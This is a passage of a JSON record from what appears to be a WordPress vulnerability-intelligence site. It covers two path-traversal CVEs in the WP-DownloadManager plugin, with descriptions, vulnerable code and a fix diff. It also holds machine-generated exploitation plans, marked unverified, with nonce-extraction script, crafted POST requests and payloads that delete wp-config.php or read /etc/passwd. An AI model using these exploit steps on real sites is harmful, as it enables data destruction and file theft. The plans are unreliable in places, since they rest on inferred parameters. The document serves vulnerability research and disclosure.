[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f3rClft7NqEKz_gqFENXPY7_q7CUPrxh6woqaXpbc0gA":3,"$fsNwh_L-jWAExpsGnl8e0unfmFWwRmsjIJ5IlNU7H850":885,"$fQye8yj5o9xVIulte6KJxQpkFKaCTbXAzlbz3-IKA_zI":889},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":14,"last_updated":15,"tested_up_to":16,"requires_at_least":17,"requires_php":18,"tags":19,"homepage":25,"download_link":26,"security_score":27,"vuln_count":28,"unpatched_count":29,"last_vuln_date":30,"fetched_at":31,"discovery_status":32,"vulnerabilities":33,"developer":194,"crawl_stats":39,"alternatives":202,"analysis":302,"fingerprints":860},"wp-downloadmanager","WP-DownloadManager","1.69.1","Lester Chan","https:\u002F\u002Fprofiles.wordpress.org\u002Fgamerz\u002F","\u003Ch3>General Usage\u003C\u002Fh3>\n\u003Col>\n\u003Cli>You Need To Re-Generate The Permalink \u003Ccode>WP-Admin -> Settings -> Permalinks -> Save Changes\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>To embed a specific file to be downloaded into a post\u002Fpage, use \u003Ccode>[download id=\"2\"]\u003C\u002Fcode> where 2 is your file id.\u003C\u002Fli>\n\u003Cli>To embed multiple files to be downloaded into a post\u002Fpage, use \u003Ccode>[download id=\"1,2,3\"]\u003C\u002Fcode> where 1,2,3 are your file ids.\u003C\u002Fli>\n\u003Cli>To limit the number of embedded downloads shown for each post in a post stream, use the \u003Ccode>stream_limit\u003C\u002Fcode> option.\n\u003Col>\n\u003Cli>Example: \u003Ccode>[download id=\"2\" stream_limit=\"4\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>This will only display the first 4 downloads for the post when rendered in a post stream, and display the full list of downloads when viewing the single post.\u003C\u002Fli>\n\u003C\u002Fol>\n\u003C\u002Fli>\n\u003Cli>To sort embedded downloads, use the \u003Ccode>sort_by\u003C\u002Fcode> and \u003Ccode>sort_order\u003C\u002Fcode> options.\n\u003Col>\n\u003Cli>Example: \u003Ccode>[download id=\"2\" sort_by=\"file_id\" sort_order=\"asc\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>This will sort the embedded downloads by file ID in ascending order.\u003C\u002Fli>\n\u003Cli>Valid values for \u003Ccode>sort_by\u003C\u002Fcode> are: \u003Ccode>file_id\u003C\u002Fcode>, \u003Ccode>file\u003C\u002Fcode>, \u003Ccode>file_name\u003C\u002Fcode>, \u003Ccode>file_size\u003C\u002Fcode>, \u003Ccode>file_date\u003C\u002Fcode>, and \u003Ccode>file_hits\u003C\u002Fcode>\u003C\u002Fli>\n\u003C\u002Fol>\n\u003C\u002Fli>\n\u003Cli>To choose what to display within the embedded file, use \u003Ccode>[download id=\"1\" display=\"both\"]\u003C\u002Fcode> where 1 is your file id and both will display both the file name and file desccription, whereas name will only display the filename. Note that this will overwrite the “Download Embedded File” template you have in your Download Templates.\u003C\u002Fli>\n\u003Cli>To embed files as well as categories, use \u003Ccode>[download id=\"1,2,3\" category=\"4,5,6\"]\u003C\u002Fcode> where 1,2,3 are your file id and 4,5,6 are your category ids.\u003C\u002Fli>\n\u003Cli>If you are using Default Permalinks, the file direct download link will be \u003Ccode>http:\u002F\u002Fyoursite.com\u002Findex.php?dl_id=2\u003C\u002Fcode>. If you are using Nice Permalinks, the file direct download link will be \u003Ccode>http:\u002F\u002Fyoursite.com\u002Fdownload\u002F2\u002F\u003C\u002Fcode>, where yoursite.com is your WordPress URL and 2 is your file id.\u003C\u002Fli>\n\u003Cli>The direct download category link will be \u003Ccode>http:\u002F\u002Fyoursite.com\u002Fdownloads\u002F?dl_cat=3\u003C\u002Fcode>, where yoursite.com is your WordPress URL, downloads is your Downloads Page name and 3 is your download category id.\u003C\u002Fli>\n\u003Cli>In order to upload the files straight to the downloads folder, the folder must be first CHMOD to 777. You can specify which folder to be the downloads folder in Download Options.\u003C\u002Fli>\n\u003Cli>You can configure the Download Options in \u003Ccode>WP-Admin -> Downloads -> Download Options\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>You can configure the Download Templates in \u003Ccode>WP-Admin -> Downloads -> Download Templates\u003C\u002Fcode>\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Ch3>Downloads Page\u003C\u002Fh3>\n\u003Col>\n\u003Cli>Go to \u003Ccode>WP-Admin -> Pages -> Add New\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>Type any title you like in the post’s title area\u003C\u002Fli>\n\u003Cli>If you \u003Ccode>ARE\u003C\u002Fcode> using nice permalinks, after typing the title, WordPress will generate the permalink to the page. You will see an ‘Edit’ link just beside the permalink.\u003C\u002Fli>\n\u003Cli>Click ‘Edit’ and type in \u003Ccode>downloads\u003C\u002Fcode> in the text field and click ‘Save’.\u003C\u002Fli>\n\u003Cli>Type \u003Ccode>[page_download]\u003C\u002Fcode> in the post’s content area.\u003C\u002Fli>\n\u003Cli>You can also use \u003Ccode>[page_download category=\"1\"]\u003C\u002Fcode>, this will display all downloads in Category ID 1.\u003C\u002Fli>\n\u003Cli>Click ‘Publish’\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Ch3>Download Stats (With Widgets)\u003C\u002Fh3>\n\u003Col>\n\u003Cli>Go to \u003Ccode>WP-Admin -> Appearance -> Widgets\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>The widget name is \u003Ccode>Downloads\u003C\u002Fcode>.\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Ch3>Development\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Flesterchan\u002Fwp-downloadmanager\" title=\"https:\u002F\u002Fgithub.com\u002Flesterchan\u002Fwp-downloadmanager\" rel=\"nofollow ugc\">https:\u002F\u002Fgithub.com\u002Flesterchan\u002Fwp-downloadmanager\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Translations\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Ca href=\"http:\u002F\u002Fdev.wp-plugins.org\u002Fbrowser\u002Fwp-downloadmanager\u002Fi18n\u002F\" title=\"http:\u002F\u002Fdev.wp-plugins.org\u002Fbrowser\u002Fwp-downloadmanager\u002Fi18n\u002F\" rel=\"nofollow ugc\">http:\u002F\u002Fdev.wp-plugins.org\u002Fbrowser\u002Fwp-downloadmanager\u002Fi18n\u002F\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Credits\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Plugin icon by \u003Ca href=\"http:\u002F\u002Fwww.freepik.com\" rel=\"nofollow ugc\">Freepik\u003C\u002Fa> from \u003Ca href=\"http:\u002F\u002Fwww.flaticon.com\" rel=\"nofollow ugc\">Flaticon\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Icons courtesy of \u003Ca href=\"http:\u002F\u002Fwww.famfamfam.com\u002F\" title=\"FamFamFam\" rel=\"nofollow ugc\">FamFamFam\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Download Icon by \u003Ca href=\"http:\u002F\u002Fwww.imvain.com\u002F\"\" title=\"Ryan Zimmerman\" rel=\"nofollow ugc\">Ryan Zimmerman\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Donations\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>I spent most of my free time creating, updating, maintaining and supporting these plugins, if you really love my plugins and could spare me a couple of bucks, I will really appreciate it. If not feel free to use it without any obligations.\u003C\u002Fli>\n\u003C\u002Ful>\n","Adds a simple download manager to your WordPress blog.",3000,309457,80,37,"2026-02-13T01:54:00.000Z","6.9.4","4.0","",[20,21,22,23,24],"download","downloads","file","files","manager","https:\u002F\u002Flesterchan.net\u002Fportfolio\u002Fprogramming\u002Fphp\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.69.1.zip",89,10,0,"2026-02-17 21:55:19","2026-04-16T10:56:18.058Z","no_bundle",[34,65,85,101,116,127,143,158,168,179],{"id":35,"url_slug":36,"title":37,"description":38,"plugin_slug":4,"theme_slug":39,"affected_versions":40,"patched_in_version":6,"severity":41,"cvss_score":42,"cvss_vector":43,"vuln_type":44,"published_date":30,"updated_date":45,"references":46,"days_to_patch":48,"patch_diff_files":49,"patch_trac_url":39,"research_status":54,"research_verified":55,"research_rounds_completed":56,"research_plan":57,"research_summary":58,"research_vulnerable_code":59,"research_fix_diff":60,"research_exploit_outline":61,"research_model_used":62,"research_started_at":63,"research_completed_at":64,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":55,"poc_model_used":39,"poc_verification_depth":39},"CVE-2026-2426","wp-downloadmanager-authenticated-administrator-path-traversal-to-arbitrary-file-deletion-via-file-parameter","WP-DownloadManager \u003C= 1.69 - Authenticated (Administrator+) Path Traversal to Arbitrary File Deletion via 'file' Parameter","The WP-DownloadManager plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.69 via the 'file' parameter in the file deletion functionality. This is due to insufficient validation of user-supplied file paths, allowing directory traversal sequences. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can lead to remote code execution when critical files like wp-config.php are deleted.",null,"\u003C=1.69","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:N\u002FI:H\u002FA:H","Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","2026-02-18 10:20:51",[47],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa3f791dd-7c24-45e3-b4f6-b8d7e594c568?source=api-prod",1,[50,51,52,53],"download-manager.php","download-options.php","readme.txt","wp-downloadmanager.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-2426 - WP-DownloadManager Path Traversal\n\n## 1. Vulnerability Summary\nWP-DownloadManager (\u003C= 1.69) contains a path traversal vulnerability in its file deletion functionality within `download-manager.php`. The plugin fails to validate or sanitize the `file` parameter against directory traversal sequences (e.g., `..\u002F`). This allows an authenticated administrator to delete arbitrary files on the server by traversing out of the configured download directory. Deleting critical files like `wp-config.php` can lead to site takeover or remote code execution by re-triggering the WordPress installation process.\n\n## 2. Attack Vector Analysis\n* **Endpoint:** `wp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-manager.php`\n* **Method:** `POST`\n* **Authentication:** Required (Administrator or user with `manage_downloads` capability).\n* **Vulnerable Parameter:** `file`\n* **Action Parameter:** `do` (Set to the localized string for \"Delete File\")\n* **Nonce Parameter:** `_wpnonce` (Action: `wp-downloadmanager_delete-file`)\n* **Precondition:** At least one download must exist in the system to easily retrieve a valid nonce and `file_id` from the management UI.\n\n## 3. Code Flow\n1. **Entry Point:** The administrator accesses the \"Manage Downloads\" menu. `wp-downloadmanager.php` loads `download-manager.php`.\n2. **Capability Check:** `download-manager.php` checks `current_user_can( 'manage_downloads' )`.\n3. **Action Trigger:** The script checks `if(!empty($_POST['do']))`. If `$_POST['do']` matches the localized string for `Delete File` (e.g., `__('Delete File', 'wp-downloadmanager')`), it enters the deletion block.\n4. **Nonce Verification:** It calls `check_admin_referer('wp-downloadmanager_delete-file')`.\n5. **Path Resolution (The Sink):**\n * `$file_path = get_option( 'download_path' );` (Typically points to `wp-content\u002Fuploads\u002Fdownloads` or similar).\n * `$file_to_delete = $_POST['file'];` (User-controlled).\n * The plugin performs an `unlink($file_path . $file_to_delete)` or similar file operation without stripping `..\u002F` sequences.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is required for the deletion action. Since this is an administrator-level exploit, we will use the `browser_eval` tool to extract the nonce from the \"Manage Downloads\" page.\n\n1. **Navigate:** Use `browser_navigate` to `wp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-manager.php`.\n2. **Identify Nonce:** The deletion forms are typically located in the downloads table. Each row has a \"Delete\" button.\n3. **Extraction JS:** \n ```javascript\n \u002F\u002F Find the hidden input with name '_wpnonce' inside a form that has 'Delete File' action\n (function() {\n const deleteBtn = Array.from(document.querySelectorAll('input[type=\"submit\"]')).find(el => el.value === 'Delete File');\n if (deleteBtn && deleteBtn.form) {\n return deleteBtn.form.querySelector('input[name=\"_wpnonce\"]').value;\n }\n return null;\n })()\n ```\n4. **Note:** The `file_id` for a specific row can also be extracted from the same form (`input[name=\"file_id\"]`).\n\n## 5. Exploitation Strategy\n### Step 1: Authentication\nLog in as an Administrator using the provided credentials.\n\n### Step 2: Test Data Setup\nWe need a dummy file and a corresponding entry in the plugin to generate the management UI.\n1. **Create Canary File:** `touch \u002Fvar\u002Fwww\u002Fhtml\u002Ftraversal-canary.php`\n2. **Configure Download Path:** Ensure `download_path` is set to a known location via WP-CLI: `wp option update download_path \"\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\" --format=json`.\n3. **Add Dummy Download:** \n ```bash\n wp db query \"INSERT INTO wp_downloads (file_name, file, file_size, file_date, file_updated_date, file_last_downloaded_date) VALUES ('Canary', 'canary.txt', 0, NOW(), NOW(), NOW());\"\n ```\n\n### Step 3: Extract Nonce and ID\n1. Navigate to `admin.php?page=wp-downloadmanager\u002Fdownload-manager.php`.\n2. Use `browser_eval` with the script in Section 4 to get the `_wpnonce` and `file_id`.\n\n### Step 4: Execution\nSend a POST request to delete the canary file at the root.\n\n* **URL:** `https:\u002F\u002Ftarget.local\u002Fwp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-manager.php`\n* **Method:** `POST`\n* **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n* **Body:**\n ```\n do=Delete File&\n file=..\u002Ftraversal-canary.php&\n file_id=[EXTRACTED_ID]&\n _wpnonce=[EXTRACTED_NONCE]\n ```\n *(Note: The `do` value must match the exact button text, usually \"Delete File\" in English).*\n\n## 6. Expected Results\n* **Response:** The server should respond with a 200 OK and a message indicating the file was deleted (e.g., \"File Deleted\").\n* **Side Effect:** The file `\u002Fvar\u002Fwww\u002Fhtml\u002Ftraversal-canary.php` will be removed from the filesystem.\n\n## 7. Verification Steps\n1. **Check Filesystem:** Use WP-CLI to check if the canary file exists:\n ```bash\n ls \u002Fvar\u002Fwww\u002Fhtml\u002Ftraversal-canary.php\n ```\n (Expected: `ls: cannot access ... No such file or directory`)\n2. **Check Database:** Verify the entry was also removed from the downloads table:\n ```bash\n wp db query \"SELECT * FROM wp_downloads WHERE file_name='Canary';\"\n ```\n\n## 8. Alternative Approaches\nIf the \"Delete File\" action name is different due to translation:\n1. Inspect the page source to find the value of the `input[type=\"submit\"]` button in the delete form.\n2. Use that value in the `do` parameter.\n\nIf the individual delete fails, check for **Bulk Actions**:\n* The `do` parameter might be `Delete` with an array of `file_ids[]`.\n* Check if the bulk delete logic also uses the `file` parameter directly.\n* The primary traversal is documented to be in the `file` parameter during the `Delete File` case.","The WP-DownloadManager plugin for WordPress is vulnerable to arbitrary file deletion via path traversal in versions up to and including 1.69. Authenticated administrators can exploit the 'file' parameter during the file deletion process by including directory traversal sequences (e.g., ..\u002F), allowing them to delete critical system files like wp-config.php. Deletion of configuration files can reset the site and potentially lead to remote code execution during the re-installation process.","\u002F* download-manager.php lines 208-215 *\u002F\ncase __('Delete File', 'wp-downloadmanager');\n\tcheck_admin_referer('wp-downloadmanager_delete-file');\n\t$file_id = ! empty( $_POST['file_id'] ) ? intval( $_POST['file_id'] ) : 0;\n\t$file = ! empty( $_POST['file'] ) ? sanitize_text_field( $_POST['file'] ) : '';\n\t$file_name = ! empty( $_POST['file_name'] ) ? sanitize_text_field( $_POST['file_name'] ) : '';\n\t$unlinkfile = ! empty( $_POST['unlinkfile'] ) ? intval( $_POST['unlinkfile'] ) : 0;\n\tif($unlinkfile == 1) {\n\t\tif(!unlink($file_path.$file)) {","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69\u002Fdownload-manager.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69.1\u002Fdownload-manager.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69\u002Fdownload-manager.php\t2024-08-19 13:32:44.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69.1\u002Fdownload-manager.php\t2026-02-13 01:54:04.000000000 +0000\n@@ -208,21 +213,20 @@\n \t\tcase __('Delete File', 'wp-downloadmanager');\n \t\t\tcheck_admin_referer('wp-downloadmanager_delete-file');\n \t\t\t$file_id = ! empty( $_POST['file_id'] ) ? intval( $_POST['file_id'] ) : 0;\n-\t\t\t$file = ! empty( $_POST['file'] ) ? sanitize_text_field( $_POST['file'] ) : '';\n-\t\t\t$file_name = ! empty( $_POST['file_name'] ) ? sanitize_text_field( $_POST['file_name'] ) : '';\n+\t\t\t$file = $wpdb->get_row( $wpdb->prepare( \"SELECT * FROM $wpdb->downloads WHERE file_id = %d\", $file_id ) );\n \t\t\t$unlinkfile = ! empty( $_POST['unlinkfile'] ) ? intval( $_POST['unlinkfile'] ) : 0;\n-\t\t\tif($unlinkfile == 1) {\n-\t\t\t\tif(!unlink($file_path.$file)) {\n-\t\t\t\t\t$text = '\u003Cp style=\"color: red;\">'.sprintf(__('Error In Deleting File \\'%s (%s)\\' From Server', 'wp-downloadmanager'), $file_name, $file).'\u003C\u002Fp>';\n+\t\t\tif ( $unlinkfile === 1 ) {\n+\t\t\t\tif ( ! unlink( $file_path . $file->file ) ) {\n+\t\t\t\t\t$text = '\u003Cp style=\"color: red;\">' . sprintf( __( 'Error In Deleting File \\'%s (%s)\\' From Server', 'wp-downloadmanager' ), $file->file_name, $file->file ) . '\u003C\u002Fp>';\n \t\t\t\t} else {\n-\t\t\t\t\t$text = '\u003Cp style=\"color: green;\">'.sprintf(__('File \\'%s (%s)\\' Deleted From Server Successfully', 'wp-downloadmanager'), $file_name, $file).'\u003C\u002Fp>';\n+\t\t\t\t\t$text = '\u003Cp style=\"color: green;\">' . sprintf( __( 'File \\'%s (%s)\\' Deleted From Server Successfully', 'wp-downloadmanager' ), $file->file_name, $file->file ) . '\u003C\u002Fp>';\n \t\t\t\t}\n \t\t\t}\n-\t\t\t$deletefile = $wpdb->query(\"DELETE FROM $wpdb->downloads WHERE file_id = $file_id\");\n-\t\t\tif(!$deletefile) {\n-\t\t\t\t$text .= '\u003Cp style=\"color: red;\">'.sprintf(__('Error In Deleting File \\'%s (%s)\\'', 'wp-downloadmanager'), $file_name, $file).'\u003C\u002Fp>';\n+\t\t\t$deletefile = $wpdb->query( $wpdb->prepare( \"DELETE FROM $wpdb->downloads WHERE file_id = %d\", $file->file_id ) );\n+\t\t\tif ( ! $deletefile ) {\n+\t\t\t\t$text .= '\u003Cp style=\"color: red;\">' . sprintf( __('Error In Deleting File \\'%s (%s)\\'', 'wp-downloadmanager'), $file->file_name, $file->file) . '\u003C\u002Fp>';\n \t\t\t} else {\n-\t\t\t\t$text .= '\u003Cp style=\"color: green;\">'.sprintf(__('File \\'%s (%s)\\' Deleted Successfully', 'wp-downloadmanager'), $file_name, $file).'\u003C\u002Fp>';\n+\t\t\t\t$text .= '\u003Cp style=\"color: green;\">' . sprintf( __('File \\'%s (%s)\\' Deleted Successfully', 'wp-downloadmanager'), $file->file_name, $file->file) . '\u003C\u002Fp>';\n \t\t\t}\n \t\t\tbreak;\n \t}\n@@ -376,9 +380,7 @@\n \t\t\u003C?php if(!empty($text)) { echo '\u003C!-- Last Action -->\u003Cdiv id=\"message\" class=\"updated fade\">\u003Cp>'.stripslashes($text).'\u003C\u002Fp>\u003C\u002Fdiv>'; } ?>\n \t\t\u003C!-- Delete A File -->\n \t\t\u003Cform method=\"post\" action=\"\u003C?php echo admin_url('admin.php?page='.plugin_basename(__FILE__)); ?>\">\n-\t\t\t\u003Cinput type=\"hidden\" name=\"file_id\" value=\"\u003C?php echo intval($file->file_id); ?>\" \u002F>\n-\t\t\t\u003Cinput type=\"hidden\" name=\"file\" value=\"\u003C?php echo esc_attr( removeslashes( $file->file ) ); ?>\" \u002F>\n-\t\t\t\u003Cinput type=\"hidden\" name=\"file_name\" value=\"\u003C?php echo esc_attr( removeslashes( $file->file_name ) ); ?>\" \u002F>\n+\t\t\t\u003Cinput type=\"hidden\" name=\"file_id\" value=\"\u003C?php echo esc_attr( intval( $file->file_id ) ); ?>\" \u002F>\n \t\t\t\u003C?php wp_nonce_field('wp-downloadmanager_delete-file'); ?>\n \t\t\t\u003Cdiv class=\"wrap\">\n \t\t\t\t\u003Ch2>\u003C?php _e('Delete A File', 'wp-downloadmanager'); ?>\u003C\u002Fh2>","To exploit this vulnerability, an attacker must have Administrator access or the 'manage_downloads' capability. \n\n1. Log in to the WordPress dashboard and navigate to the 'Manage Downloads' section of the WP-DownloadManager plugin.\n2. Create or identify an existing download record to retrieve its `file_id` and a valid `_wpnonce` for the `wp-downloadmanager_delete-file` action.\n3. Send a POST request to `\u002Fwp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-manager.php` with the following parameters:\n - `do`: The localized string for 'Delete File'.\n - `file_id`: The ID of the identified download record.\n - `unlinkfile`: Set to 1 (to trigger the file system deletion).\n - `_wpnonce`: The extracted nonce value.\n - `file`: A path traversal string targeting the sensitive file (e.g., `..\u002F..\u002F..\u002Fwp-config.php`).\n4. The plugin will concatenate the download directory path with the user-controlled traversal string and call `unlink()`, deleting the target file.","gemini-3-flash-preview","2026-04-19 05:34:11","2026-04-19 05:34:32",{"id":66,"url_slug":67,"title":68,"description":69,"plugin_slug":4,"theme_slug":39,"affected_versions":40,"patched_in_version":6,"severity":70,"cvss_score":71,"cvss_vector":72,"vuln_type":44,"published_date":73,"updated_date":74,"references":75,"days_to_patch":48,"patch_diff_files":77,"patch_trac_url":39,"research_status":54,"research_verified":55,"research_rounds_completed":56,"research_plan":78,"research_summary":79,"research_vulnerable_code":80,"research_fix_diff":81,"research_exploit_outline":82,"research_model_used":62,"research_started_at":83,"research_completed_at":84,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":55,"poc_model_used":39,"poc_verification_depth":39},"CVE-2026-2419","wp-downloadmanager-authenticated-administrator-path-traversal-to-arbitrary-file-read-via-downloadpath-parameter","WP-DownloadManager \u003C= 1.69 - Authenticated (Administrator+) Path Traversal to Arbitrary File Read via 'download_path' Parameter","The WP-DownloadManager plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.69 via the 'download_path' configuration parameter. This is due to insufficient validation of the download path setting, which allows directory traversal sequences to bypass the WP_CONTENT_DIR prefix check. This makes it possible for authenticated attackers, with Administrator-level access and above, to configure the plugin to list and access arbitrary files on the server by exploiting the file browser functionality.","low",2.7,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","2026-02-17 19:12:08","2026-02-18 07:25:42",[76],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F0bb96da1-9c17-4264-ac29-b5ff8dec745d?source=api-prod",[50,51,52,53],"# Exploitation Research Plan: CVE-2026-2419\n\n## 1. Vulnerability Summary\nThe **WP-DownloadManager** plugin (\u003C= 1.69) contains a path traversal vulnerability in its configuration settings. The plugin attempts to restrict the `download_path` (the directory where downloads are stored) to the `WP_CONTENT_DIR` directory. However, the validation logic in `download-options.php` only checks if the user-provided string *starts* with the content directory path. It fails to sanitize or check for directory traversal sequences (e.g., `..\u002F`) following the prefix. This allows an authenticated administrator to escape the intended directory and point the plugin to the server root (e.g., `\u002Fetc\u002F` or `\u002F`). Once the path is manipulated, the plugin's file listing and download features can be used to read arbitrary files from the server.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `wp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-options.php`\n- **Hook**: The options page is registered via `add_submenu_page` in `wp-downloadmanager.php` with the `manage_downloads` capability.\n- **Vulnerable Parameter**: `download_path`\n- **Authentication**: Required (Administrator or user with `manage_downloads` capability).\n- **Preconditions**: None, other than administrative access.\n- **CSRF Protection**: The plugin uses `wp_nonce_field('wp-downloadmanager_options')` and `check_admin_referer('wp-downloadmanager_options')`.\n\n## 3. Code Flow\n1. **Source (`download-options.php`)**:\n - The script receives `$_POST['download_path']`.\n - It performs a prefix check:\n ```php\n if ( substr( $download_path, 0, strlen( WP_CONTENT_DIR ) ) !== WP_CONTENT_DIR ) {\n $download_path = WP_CONTENT_DIR;\n }\n ```\n - If `WP_CONTENT_DIR` is `\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content`, a payload like `\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002F..\u002F..\u002F..\u002F..\u002F` satisfies the check.\n - The value is saved via `update_option('download_path', $download_path)`.\n\n2. **Sink (`download-manager.php` and `download-add.php`)**:\n - The plugin retrieves the path: `$file_path = get_option( 'download_path' );`.\n - In the \"Add File\" or \"Edit File\" logic, it uses this path to check files:\n ```php\n $file_size = filesize($file_path.$file);\n ```\n - When a file is requested on the frontend (via `\u002F?dl_id=X`), the plugin reads the file from `$file_path . $filename` and streams it to the user.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability requires an authenticated Administrator. Nonces are required for both updating options and adding files.\n\n1. **Obtaining `download-options.php` Nonce**:\n - Navigate to the Download Options page using `browser_navigate`.\n - The nonce is generated by `wp_nonce_field('wp-downloadmanager_options')`.\n - Use `browser_eval` to extract the value from the hidden input:\n ```javascript\n document.querySelector('input[name=\"_wpnonce\"]').value\n ```\n\n2. **Obtaining `download-add.php` Nonce** (if needed to add a file):\n - Navigate to the \"Add File\" page: `wp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-add.php`.\n - Extract the nonce for `wp-downloadmanager_add-file` (inferred action name based on `download-manager.php` patterns).\n\n## 5. Exploitation Strategy\n\n### Step 1: Update Download Path to Server Root\n- **Request**: `POST \u002Fwp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-options.php`\n- **Body**:\n - `_wpnonce`: `[EXTRACTED_NONCE]`\n - `_wp_http_referer`: `\u002Fwp-admin\u002Fadmin.php?page=wp-downloadmanager%2Fdownload-options.php`\n - `download_path`: `[WP_CONTENT_DIR]\u002F..\u002F..\u002F..\u002F..\u002F` (e.g., `\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002F..\u002F..\u002F..\u002F..\u002F` to reach `\u002F`)\n - `Submit`: `Save Changes`\n- **Validation**: Check if the response contains \"Download Path Updated\".\n\n### Step 2: Add a Sensitive File\n- **Request**: `POST \u002Fwp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-add.php` (Note: `download-add.php` handles adding new files).\n- **Body**:\n - `_wpnonce`: `[EXTRACTED_ADD_NONCE]`\n - `file_type`: `0` (Local file)\n - `file`: `etc\u002Fpasswd` (Relative to our new root `\u002F`)\n - `file_name`: `Traversed File`\n - `do`: `Add File`\n- **Note**: The exact parameters for `download-add.php` can be verified by observing the form on that page.\n\n### Step 3: Trigger Arbitrary File Read\n- Identify the `dl_id` of the newly created file (usually returned in the URL or displayed in the Manage Downloads table).\n- **Request**: `GET \u002F?dl_id=[ID]`\n- **Response**: The content of `\u002Fetc\u002Fpasswd`.\n\n## 6. Test Data Setup\n1. **Identify `WP_CONTENT_DIR`**: Use `wp eval \"echo WP_CONTENT_DIR;\"` to determine the exact prefix required.\n2. **Administrator User**: Ensure a user exists with the `administrator` role.\n3. **Plugin Activation**: `wp plugin activate wp-downloadmanager`.\n\n## 7. Expected Results\n- After Step 1, the `download_path` option in the database should reflect the traversal string.\n- After Step 2, a new entry in the `wp_downloads` table should exist with the `file` column set to `etc\u002Fpasswd`.\n- After Step 3, the HTTP response body should contain the string `root:x:0:0:root`.\n\n## 8. Verification Steps\n1. **Verify Option Change**:\n `wp option get download_path`\n2. **Verify File Entry**:\n `wp db query \"SELECT * FROM wp_downloads WHERE file_name = 'Traversed File'\"`\n3. **Verify File Delivery**:\n Check the response of the `GET \u002F?dl_id=[ID]` request for sensitive system data.\n\n## 9. Alternative Approaches\nIf \"Add File\" fails due to directory permissions or complexity:\n- **Direct Link Guessing**: If the traversal path is set to `\u002F`, and the plugin uses a predictable file naming\u002Fstoring convention, check if `download-manager.php`'s \"Edit File\" mode allows modifying an existing download's `file` parameter to `..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd` directly.\n- **Remote File filesize disclosure**: If the plugin refuses to add a file that \"doesn't exist,\" the `filesize()` call in `download-manager.php` can be used to verify the existence of files on the system by observing whether the file size is correctly calculated and displayed in the admin UI.","WP-DownloadManager versions up to 1.69 are vulnerable to Path Traversal because the 'download_path' configuration check only validates the prefix of the path, allowing directory traversal sequences to escape the intended directory. Authenticated administrators can exploit this to point the plugin to the server root and subsequently read arbitrary system files through the file download functionality.","\u002F\u002F download-options.php\n\n$download_path = ! empty( $_POST['download_path'] ) ? sanitize_text_field( $_POST['download_path'] ) : '';\n\n\u002F\u002F ... \n\n\u002F\u002F Line 65: Insufficient validation only checks if path starts with WP_CONTENT_DIR\n\u002F\u002F It does not account for 